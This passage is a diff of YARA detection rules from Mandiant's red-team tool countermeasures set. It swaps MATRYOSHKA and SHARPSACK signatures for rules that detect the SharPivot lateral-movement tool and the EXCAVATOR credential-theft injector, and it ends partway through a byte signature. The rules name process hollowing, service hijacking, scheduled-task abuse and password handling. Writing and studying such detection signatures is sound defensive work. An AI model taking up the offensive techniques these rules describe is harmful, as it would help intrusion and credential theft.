 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "edcd58ba5b1b87705e95089002312281"
-		logic_hash = "a7bf7599ec9b4b1d09a8c90b70ae565a9396fb31d449da3c1492d6fa336d9c5e"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "5d10557a83dae9508469fe87f4c0c91beec4d2812856eee461a82d5dbb89aa35"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$s1 = "\x00matryoshka.exe\x00"
-		$s2 = "\x00Unable to write data\x00"
-		$s3 = "\x00Error while spawning process. NTStatus: \x0a\x00"
-		$s4 = "\x00.execmdstart/Cfailed to execute process\x00"
+		$typelibguid0 = "113ae281-d1e5-42e7-9cc2-12d30757baf1" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Loader_Win64_MATRYOSHKA_2 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_4 : FILE
 {
 	meta:
-		description = "matryoshka.rs"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharPivot project."
 		author = "FireEye"
-		id = "25f916bc-6ee1-5175-903c-4266b0a086e1"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "c1bd64da-6a54-5bc6-8a89-9c8a93dd965c"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win64_MATRYOSHKA_2.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_4.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "7f8102b789303b7861a03290c79feba0"
-		logic_hash = "daa6f6d526bf959c268b2c5a4cae33307cfec5e9ca51283131bbfa66a582b505"
+		hash = "e4efa759d425e2f26fbc29943a30f5bd"
+		logic_hash = "7ef883148926d5786861e5e81b1e645aa2e3ca06bd663f2b5f32e04b5852a218"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$sb1 = { 4D [2] 00 49 [2] 08 B? 02 00 00 00 31 ?? E8 [4] 48 89 ?? 48 89 ?? 4C 89 ?? 49 89 ?? E8 [4] 4C 89 ?? 48 89 ?? E8 [4] 83 [2] 01 0F 84 [4] 48 89 ?? 48 8B [2] 48 8B [2] 48 89 [5] 48 89 [5] 48 89 [5] 41 B? [4] 4C 89 ?? 31 ?? E8 [4] C7 45 [5] 48 89 ?? 4C 89 ?? E8 [4] 85 C0 }
-		$sb2 = { 4C [2] 0F 83 [4] 41 0F [3] 01 41 32 [2] 00 48 8B [5] 48 3B [5] 75 ?? 41 B? 01 00 00 00 4C 89 ?? E8 [4] E9 }
-		$si1 = "CreateToolhelp32Snapshot" fullword
-		$si2 = "Process32Next" fullword
+		$typelibguid1 = "44B83A69-349F-4A3E-8328-A45132A70D62" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_APT_Builder_PY_MATRYOSHKA_1
+rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_2 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "0135f3bb-28b3-5fc4-85a2-b12c46c8bc45"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "8d6d28ce-de3a-5a38-b654-ba1372d47568"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Builder_PY_MATRYOSHKA_1.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_2.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "25a97f6dba87ef9906a62c1a305ee1dd"
-		logic_hash = "71b26f4b319429ac356b55d22bccd1da85894d61f8c96452422de78d2d893420"
+		hash = "e4efa759d425e2f26fbc29943a30f5bd"
+		logic_hash = "14e4a29a32e8441a6f7f322e09cd9bb9822ae47eaa1fdf8e09c90998b03658f5"
 		score = 75
-		quality = 50
-		tags = ""
-		rev = 1
+		quality = 75
+		tags = "FILE"
+		rev = 3
 
 	strings:
-		$s1 = ".pop(0)])"
-		$s2 = "[1].replace('unsigned char buf[] = \"'"
-		$s3 = "binascii.hexlify(f.read()).decode("
-		$s4 = "os.system(\"cargo build {0} --bin {1}\".format("
-		$s5 = "shutil.which('rustc')"
-		$s6 = "~/.cargo/bin"
-		$s7 = /[\x22\x27]\\\\x[\x22\x27]\.join\(\[\w{1,64}\[\w{1,64}:\w{1,64}[\x09\x20]{0,32}\+[\x09\x20]{0,32}2\]/
+		$s1 = "costura"
+		$s2 = "cmd_schtask" wide
+		$s3 = "cmd_wmi" wide
+		$s4 = "cmd_rpc" wide
+		$s5 = "GoogleUpdateTaskMachineUA" wide
+		$s6 = "servicehijack" wide
+		$s7 = "poisonhandler" wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Dropper_Win64_MATRYOSHKA_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_3 : FILE
 {
 	meta:
-		description = "matryoshka_dropper.rs"
+		description = "This rule looks for .NET PE files that have the strings of various method names in the SharPivot code."
 		author = "FireEye"
-		id = "1406aafd-6217-51ef-b3af-107ee88f9c99"
-		date = "2020-12-02"
-		date = "2020-12-02"
-		modified = "2020-12-09"
+		id = "616333fc-4075-5f04-823a-1164717a2b87"
+		date = "2020-12-08"
+		modified = "2020-12-10"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Dropper_Win64_MATRYOSHKA_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_3.yar#L4-L31"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "edcd58ba5b1b87705e95089002312281"
-		logic_hash = "23f811f8e9387ca6a1257a31af66de9739733e4728adba0a3e3f74b5e5c0a556"
+		hash = "e4efa759d425e2f26fbc29943a30f5bd"
+		logic_hash = "ecf13e47e409efd68b508735a84be6a1627f5b0c0cea6b90434fc9ba5b1d8cf5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$sb1 = { 8D 8D [4] E8 [4] 49 89 D0 C6 [2-6] 01 C6 [2-6] 01 [0-8] C7 44 24 ?? 0E 00 00 00 4C 8D 0D [4] 48 8D 8D [4] 48 89 C2 E8 [4] C6 [2-6] 01 C6 [2-6] 01 48 89 E9 48 8D 95 [4] E8 [4] 83 [2] 01 0F 8? [4] 48 01 F3 48 29 F7 48 [2] 08 48 89 85 [4] C6 [2-6] 01 C6 [2-6] 01 C6 [2-6] 01 48 8D 8D [4] 48 89 DA 49 89 F8 E8 }
-		$sb2 = { 0F 29 45 ?? 48 C7 45 ?? 00 00 00 00 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 48 C7 45 ?? 00 00 00 00 C7 45 ?? 68 00 00 00 48 8B [2] 48 8D [2] 48 89 [3] 48 89 [3] 0F 11 44 24 ?? C7 44 24 ?? 08 00 00 0C C7 44 24 ?? 00 00 00 00 31 ?? 48 89 ?? 31 ?? 45 31 ?? 45 31 ?? E8 [4] 83 F8 01 }
+		$msil = "_CorExeMain" ascii wide
+		$str1 = "SharPivot" ascii wide
+		$str2 = "ParseArgs" ascii wide
+		$str3 = "GenRandomString" ascii wide
+		$str4 = "ScheduledTaskExists" ascii wide
+		$str5 = "ServiceExists" ascii wide
+		$str6 = "lpPassword" ascii wide
+		$str7 = "execute" ascii wide
+		$str8 = "WinRM" ascii wide
+		$str9 = "SchtaskMod" ascii wide
+		$str10 = "PoisonHandler" ascii wide
+		$str11 = "SCShell" ascii wide
+		$str12 = "SchtaskMod" ascii wide
+		$str13 = "ServiceHijack" ascii wide
+		$str14 = "commandArg" ascii wide
+		$str15 = "payloadPath" ascii wide
+		$str16 = "Schtask" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
 }
-rule FIREEYE_RT_APT_Loader_Win_MATRYOSHKA_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_1 : FILE
 {
 	meta:
-		description = "matryoshka_process_hollow.rs"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "c07fb67e-ded5-593d-b5dc-d0e2c3b5a352"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "c2834bd6-efb0-5dac-adcd-a9450090fc28"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Loader_Win_MATRYOSHKA_1.yar#L4-L24"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "44887551a47ae272d7873a354d24042d"
-		logic_hash = "8f762684ffd3984630bf41ededa78b8993b53b22591a59912cabfe635775de53"
+		hash = "e4efa759d425e2f26fbc29943a30f5bd"
+		logic_hash = "1c71b9641e30c9764f3503e49f8f85472d7e62384c8dd2b420c4fa2b2fccda4f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$s1 = "ZwQueryInformationProcess" fullword
-		$s2 = "WriteProcessMemory" fullword
-		$s3 = "CreateProcessW" fullword
-		$s4 = "WriteProcessMemory" fullword
-		$s5 = "\x00Invalid NT Signature!\x00"
-		$s6 = "\x00Error while creating and mapping section. NTStatus: "
-		$s7 = "\x00Error no process information - NTSTATUS:"
-		$s8 = "\x00Error while erasing pe header. NTStatus: "
+		$s2 = { 73 ?? 00 00 0A 0A 06 1F ?? 1F ?? 6F ?? 00 00 0A 0B 73 ?? 00 00 0A 0C 16 13 04 2B 5E 23 [8] 06 6F ?? 00 00 0A 5A 23 [8] 58 28 ?? 00 00 0A 28 ?? 00 00 0A 28 ?? 00 00 0A }
+		$s3 = "cmd_rpc" wide
+		$s4 = "costura"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSACK_1 : FILE
+rule FIREEYE_RT_Credtheft_Win_EXCAVATOR_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpsack' project."
+		description = "This rule looks for the binary signature of the 'Inject' method found in the main Excavator PE."
 		author = "FireEye"
-		id = "8e344acb-73c4-5509-be9d-85cf6fe94445"
+		id = "7cabc230-e55b-5096-996a-b6a8c9693bdc"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSACK/production/yara/APT_HackTool_MSIL_SHARPSACK_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/CredTheft_Win_EXCAVATOR_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "ecc3250e65e34595b4b827add3eb3062edad6a3373930048bfd6225d4a229e93"
+		hash = "f7d9961463b5110a3d70ee2e97842ed3"
+		logic_hash = "bf4b776f34a1a9aa5438504f63a63ef452a747363de3b70cec52145d777055bd"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 4
 
 	strings:
-		$typelibguid0 = "1946808a-1a01-40c5-947b-8b4c3377f742" ascii nocase wide
+		$bytes1 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 20 01 00 00 48 8B 05 75 BF 01 00 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 8D 0D 12 A1 01 00 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 00 FF 15 CB 1F 01 00 48 85 C0 75 1B FF 15 80 1F 01 00 8B D0 48 8D 0D DF A0 01 00 E8 1A FF FF FF 33 C0 E9 B4 02 00 00 48 8D 15 D4 A0 01 00 48 89 9C 24 30 01 00 00 48 8B C8 FF 15 4B 1F 01 00 48 8B D8 48 85 C0 75 19 FF 15 45 1F 01 00 8B D0 48 8D 0D A4 A0 01 00 E8 DF FE FF FF E9 71 02 00 00 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 45 66 66 0F 1F 84 00 00 00 00 00 48 8B 4C 24 60 FF 15 4D 1F 01 00 3B C6 74 22 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 D1 EB 0A 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A0 01 00 48 8D 05 A6 C8 01 00 B9 C8 05 00 00 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 B2 FF 15 CC 1E 01 00 4C 8D 44 24 78 BA 0A 00 00 00 48 8B C8 FF 15 01 1E 01 00 85 C0 0F 84 66 01 00 00 48 8B 4C 24 78 48 8D 45 80 41 B9 02 00 00 00 48 89 44 24 28 45 33 C0 C7 44 24 20 02 00 00 00 41 8D 51 09 FF 15 D8 1D 01 00 85 C0 0F 84 35 01 00 00 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 50 01 FF 15 5C 1E 01 00 FF 15 06 1E 01 00 4C 8B 44 24 68 33 D2 48 8B C8 FF 15 DE 1D 01 00 48 8B F8 48 85 C0 0F 84 FF 00 00 00 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 50 01 FF 15 25 1E 01 00 85 C0 0F 84 E2 00 00 00 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 B8 00 00 02 00 48 C7 44 24 20 08 00 00 00 48 8B CF FF 15 6C 1D 01 00 85 C0 0F 84 B1 00 00 00 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C 8D 05 58 39 03 00 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 44 24 30 04 00 08 00 44 89 74 24 28 4C 89 74 24 20 FF 15 0C 1D 01 00 85 C0 74 65 48 8B 4C 24 70 8B 5D 98 FF 15 1A 1D 01 00 48 8B 4D 88 FF 15 10 1D 01 00 48 8B 4D 90 FF 15 06 1D 01 00 44 8B C3 33 D2 B9 3A 04 00 00 FF 15 4E 1D 01 00 48 8B D8 48 85 C0 74 2B 48 8B C8 E8 4E 06 00 00 48 85 C0 74 1E BA FF FF FF FF 48 8B C8 FF 15 3B 1D 01 00 48 8B CB FF 15 CA 1C 01 00 B8 01 00 00 00 EB 24 FF 15 DD 1C 01 00 8B D0 48 8D 0D 58 9E 01 00 E8 77 FC FF FF 48 85 FF 74 09 48 8B CF FF 15 A9 1C 01 00 33 C0 48 8B 9C 24 30 01 00 00 48 8B 4D 10 48 33 CC E8 03 07 00 00 4C 8D 9C 24 20 01 00 00 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 }
+		$bytes2 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 2? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 ?? FF ?? ?? ?? ?? ?? 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 9C 24 3? ?1 ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 66 0F 1F 84 ?? ?? ?? ?? ?? 48 8B 4C 24 60 FF ?? ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A? ?1 ?? 48 ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 ?? FF ?? ?? ?? ?? ?? 4C 8D 44 24 78 BA 0A ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 78 48 8D 45 80 41 B9 02 ?? ?? ?? 48 89 44 24 28 45 33 C0 C7 44 24 2? ?2 ?? ?? ?? 41 8D 51 09 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 5? ?1 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 4C 8B 44 24 68 33 D2 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 5? ?1 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 ?? ?? ?? ?? ?? 48 C7 44 24 2? ?8 ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C ?? ?? ?? ?? ?? ?? 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 ?? ?? ?? ?? ?? ?? ?? 44 89 74 24 28 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 70 8B 5D 98 FF ?? ?? ?? ?? ?? 48 8B 4D 88 FF ?? ?? ?? ?? ?? 48 8B 4D 90 FF ?? ?? ?? ?? ?? 44 8B C3 33 D2 B9 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? EB ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF ?? ?? ?? ?? ?? 33 C0 48 8B 9C 24 3? ?1 ?? ?? 48 8B 4D 10 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 2? ?1 ?? ?? 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 }
+		$bytes3 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 2? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 ?? FF ?? ?? ?? ?? ?? 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 9C 24 3? ?1 ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 66 0F 1F 84 ?? ?? ?? ?? ?? 48 8B 4C 24 60 FF ?? ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A? ?1 ?? 48 ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 ?? FF ?? ?? ?? ?? ?? 4C 8D 44 24 78 BA 0A ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 78 48 8D 45 80 41 B9 02 ?? ?? ?? 48 89 44 24 28 45 33 C0 C7 44 24 2? ?2 ?? ?? ?? 41 8D 51 09 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 5? ?1 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 4C 8B 44 24 68 33 D2 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 5? ?1 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 ?? ?? ?? ?? ?? 48 C7 44 24 2? ?8 ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C ?? ?? ?? ?? ?? ?? 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 ?? ?? ?? ?? ?? ?? ?? 44 89 74 24 28 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 70 8B 5D 98 FF ?? ?? ?? ?? ?? 48 8B 4D 88 FF ?? ?? ?? ?? ?? 48 8B 4D 90 FF ?? ?? ?? ?? ?? 44 8B C3 33 D2 B9 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? EB ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF ?? ?? ?? ?? ?? 33 C0 48 8B 9C 24 3? ?1 ?? ?? 48 8B 4D 10 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 2? ?1 ?? ?? 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 }
+		$bytes4 = { 48 89 74 24 ?? 48 89 7C 24 ?? 4C 89 74 24 ?? 55 48 8D 6C 24 ?? 48 81 EC 20 01 00 00 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 45 ?? 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 ?? 48 8D 0D ?? ?? ?? ?? 4C 89 74 24 ?? 0F 11 45 ?? 41 8B FE 4C 89 74 24 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 48 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 ?? 48 89 44 24 ?? 66 0F 6F 15 ?? ?? 01 00 48 8D 05 ?? ?? ?? ?? B9 C8 05 00 00 90 F3 0F 6F 40 ?? 48 8D 40 ?? 66 0F 